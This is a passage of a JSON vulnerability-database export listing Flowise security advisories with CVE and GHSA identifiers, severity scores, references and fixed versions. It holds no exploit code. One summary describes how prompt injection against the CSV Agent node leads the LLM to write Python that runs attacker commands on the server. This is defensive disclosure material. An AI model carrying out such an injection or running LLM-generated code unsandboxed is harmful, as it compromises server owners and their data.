                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:35:16Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-30820",
                "GHSA-wvhq-wp8g-c7vq"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-488c-vrqu-f7hf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/120860?format=api",
            "vulnerability_id": "VCID-5hdy-fsnn-qfgq",
            "summary": "Flowise through v3.0.4 is vulnerable to remote code execution via unsanitized evaluation of user input in the \"Supabase RPC Filter\" field.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57164",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00211",
                            "scoring_system": "epss",
                            "scoring_elements": "0.43694",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57164"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/flowise%403.0.5/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/flowise%403.0.5/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164",
                    "reference_id": "CVE-2025-57164",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise",
                    "reference_id": "Flowise",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7944-7c6r-55vv",
                    "reference_id": "GHSA-7944-7c6r-55vv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-7944-7c6r-55vv"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv",
                    "reference_id": "GHSA-7944-7c6r-55vv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237",
                    "reference_id": "Supabase.ts#L237",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "CVE-2025-57164",
                "GHSA-7944-7c6r-55vv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5hdy-fsnn-qfgq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80773?format=api",
            "vulnerability_id": "VCID-5pup-kgaf-3ubw",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a flaw exists within the run method of the CSV_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM-generated Python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious Python script that executes attacker-controlled commands on the Flowise server. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41264",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00215",
                            "scoring_system": "epss",
                            "scoring_elements": "0.44078",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41264"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41264",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41264"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3hjv-c53m-58jj",
                    "reference_id": "GHSA-3hjv-c53m-58jj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3hjv-c53m-58jj"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj",
                    "reference_id": "GHSA-3hjv-c53m-58jj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T13:39:06Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41264",
                "GHSA-3hjv-c53m-58jj"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5pup-kgaf-3ubw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/67525?format=api",
            "vulnerability_id": "VCID-6ufs-d346-d7ev",
            "summary": "A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. It affects the function Login in the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely. The attack has a high complexity level, and exploitation is reported to be difficult. You should upgrade the affected component.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-8026",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00019",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05306",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-8026"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8026",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8026"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/361273",
                    "reference_id": "361273",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/361273"
                },
                {
                    "reference_url": "https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91",
                    "reference_id": "50a553f09aa1c7c04ce18cec13986a91",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/"
                        }
                    ],
                    "url": "https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91"
                },
                {
                    "reference_url": "https://vuldb.com/submit/777656",
                    "reference_id": "777656",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/"
                        }
                    ],
                    "url": "https://vuldb.com/submit/777656"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/361273/cti",
                    "reference_id": "cti",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C"
                        },
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/361273/cti"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8f47-4rh3-x44m",
                    "reference_id": "GHSA-8f47-4rh3-x44m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8f47-4rh3-x44m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-8026",
                "GHSA-8f47-4rh3-x44m"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6ufs-d346-d7ev"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360626?format=api",
            "vulnerability_id": "VCID-6wat-8akx-hycz",
            "summary": "Duplicate Advisory: Flowise vulnerable to RCE via Dynamic function constructor injection\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hmgh-466j-fx4c. This link is maintained to preserve external references.\n\n### Original Description\nUser-controlled input flows to an unsafe implementation of a dynamic Function constructor, allowing network attackers to run arbitrary unsandboxed JS code in the context of the host, by sending a simple POST request.",
            "references": [
                {
                    "reference_url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346",
                    "reference_id": "CVE-2025-55346",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q4xx-mc3q-23x8",
                    "reference_id": "GHSA-q4xx-mc3q-23x8",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-q4xx-mc3q-23x8"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "GHSA-q4xx-mc3q-23x8"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6wat-8akx-hycz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80813?format=api",
            "vulnerability_id": "VCID-71uq-yx2j-cqak",
